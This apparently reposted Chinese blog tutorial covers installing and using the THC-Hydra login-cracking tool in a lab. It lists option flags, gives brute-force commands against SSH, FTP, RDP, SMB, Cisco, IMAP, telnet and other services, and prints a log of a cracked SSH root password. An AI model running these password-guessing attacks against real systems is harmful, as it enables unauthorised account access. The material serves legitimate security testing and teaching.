THC-HYDRA是一個支援多種網絡服務的非常快速的網絡登陸破解工具。這個工具是一個驗證性質的工具,它被設計的主要目的是為研究人員和安全從業人員展示遠端擷取一個系統的認證權限是比較容易的
實驗環境
centos6.5x64
實驗安裝
hydra-7.3.tar.gz
軟體安裝
yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel
tar zxvf hydra-7.3.tar.gz
cd hydra-7.3
./configure
make
make install
hydra -version
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
touch users.txt
less users.txt
root
admin
administrator
test
touch password.txt
less password.txt
1
123
123.com
aabbcc
systemadmin
使用說明
hydra -R 繼續從上一次進度接着破解。
-S 采用SSL連結。
-s PORT 可通過這個參數指定非預設端口。
-l LOGIN 指定破解的使用者,對特定使用者破解。
-L FILE 指定使用者名字典。
-p PASS 小寫,指定密碼破解,少用,一般是采用密碼字典。
-P FILE 大寫,指定密碼字典。
-e ns 可選選項,n:空密碼試探,s:使用指定使用者和密碼試探。
-C FILE 使用冒号分割格式,例如“登入名:密碼”來代替-L/-P參數。-M FILE 指定目标清單檔案一行一條。
-o FILE 指定結果輸出檔案。
-f 在使用-M參數以後,找到第一對登入名或者密碼的時候中止破解。
-t TASKS 同時運作的線程數,預設為16。
-w TIME 設定最大逾時的時間,機關秒,預設是30s。
-v / -V 顯示詳細過程
破解ssh hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.160 ssh
破解ftp hydra ip ftp -l 使用者名 -P 密碼字典 -t 線程(預設16) -vV
hydra ip ftp -l 使用者名 -P 密碼字典 -e ns -vV
破解https hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
破解teamspeak hydra -l 使用者名 -P 密碼字典 -s 端口号 -vV ip teamspeak
破解cisco hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
破解smb hydra -l administrator -P pass.txt 10.36.16.18 smb
破解pop3 hydra -l muts -P pass.txt my.pop3.mail pop3
破解rdp hydra ip rdp -l administrator -P pass.txt -V
破解http-proxy hydra -l admin -P pass.txt http-proxy://10.36.16.18
破解imap hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
破解telnet hydra ip telnet -l 使用者 -P 密碼字典 -t 32 -s 23 -e ns -f -V
hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.160 ssh
Hydra (http://www.thc.org/thc-hydra) starting at 2016-04-12 17:30:48
[DATA] 1 task, 1 server, 35 login tries (l:5/p:7), ~35 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.1.160 - login "root" - pass "root" - 1 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "root" - pass "" - 2 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "root" - pass "1" - 3 of 35 [child 0]
[22][ssh] host: 192.168.1.160 login: root password: 1 密碼破解成功
[ATTEMPT] target 192.168.1.160 - login "admin" - pass "admin" - 8 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "admin" - pass "" - 9 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "admin" - pass "1" - 10 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "admin" - pass "123" - 11 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "admin" - pass "123.com" - 12 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "admin" - pass "aabbcc" - 13 of 35 [child 0]
本文轉自 mailfile 51CTO部落格,原文連結:http://blog.51cto.com/mailfile/1763094,如需轉載請自行聯系原作者